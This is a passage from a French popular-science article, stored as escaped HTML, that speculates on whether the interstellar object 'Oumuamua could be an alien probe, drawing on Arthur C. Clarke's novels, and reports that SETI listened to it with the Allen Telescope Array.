Il s&rsquo;agit donc incontestablement d&rsquo;un artefact d&rsquo;une civilisation ET technologiquement avanc\u00e9e.<\/p>\n<h2 class=\"subheading gamma pb1 pt3\" dir=\"ltr\">`Oumuamua a \u00e9t\u00e9 \u00e9cout\u00e9 par Seti avec l&rsquo;ATA<\/h2>\n<p class=\"zeta py0p5\" dir=\"ltr\">Or, `Oumuamua ne ressemble \u00e0 aucun des ast\u00e9ro\u00efdes du Syst\u00e8me solaire et, pour le moment, les astrophysiciens ne peuvent pas\u00a0expliquer sa forme \u00e9tir\u00e9e qui le fait ressembler \u00e0 un long cylindre d&rsquo;environ 400 m\u00e8tres de long. L&rsquo;objet est, certes, trop petit pour \u00eatre un Rama, que Clarke d\u00e9crit comme l&rsquo;\u00e9quivalent d&rsquo;une arche interstellaire inspir\u00e9e des fameuses colonies spatiales du physicien Gerard K. O&rsquo;Neill. Mais rien n&rsquo;interdit de penser qu&rsquo;il puisse s&rsquo;agir\u00a0d&rsquo;une sonde interstellaire de type von Neumann par exemple, ou, pour le moins, d&rsquo;une machine dot\u00e9e d&rsquo;une\u00a0<a title=\"Les E.T. sont des super IA : l'id\u00e9e est tr\u00e8s ancienne !\" href=\"http:\/\/www.futura-sciences.com\/sciences\/actualites\/exobiologie-et-sont-super-ia-idee-tres-ancienne-56534\/\" target=\"_blank\" rel=\"noopener\"><span class=\"link-wrapper\">super IA<\/span><\/a>. Rien n&rsquo;interdit non plus de croire que cette sonde a ralenti temporairement en fon\u00e7ant dans le Syst\u00e8me solaire pour \u00e9tudier un peu ce dernier,\u00a0la Terre en particulier, tout en restant hors de port\u00e9e des vaisseaux de l&rsquo;humanit\u00e9, par s\u00e9curit\u00e9.<\/p>\n<p class=\"zeta py0p5\" dir=\"ltr\">Si tel est bien le cas, peut-\u00eatre que cette machine est\u00a0en train d&rsquo;essayer d&rsquo;\u00e9tablir un contact temporaire par radio avec nous, un peu comme dans un autre roman d&rsquo;Arthur Clarke,\u00a0<em>Les Fontaines du paradis<\/em>, mettant en sc\u00e8ne une telle machine baptis\u00e9e \u00ab le Vagabond des \u00c9toiles \u00bb. On ne sera donc pas surpris d&rsquo;apprendre que des membres du programme Seti ont entrepris\u00a0d&rsquo;\u00e9couter `Oumuamua avec l&rsquo;<em><a title=\"En bref : Seti retrouve l'usage du ATA et \u00e9coute des exoplan\u00e8tes\" href=\"http:\/\/www.futura-sciences.com\/sciences\/actualites\/astronomie-bref-seti-retrouve-usage-ata-ecoute-exoplanetes-35352\/\" target=\"_blank\" rel=\"noopener\"><span class=\"link-wrapper\">Allen Telescope Array<\/span><\/a><\/em>\u00a0(ATA).
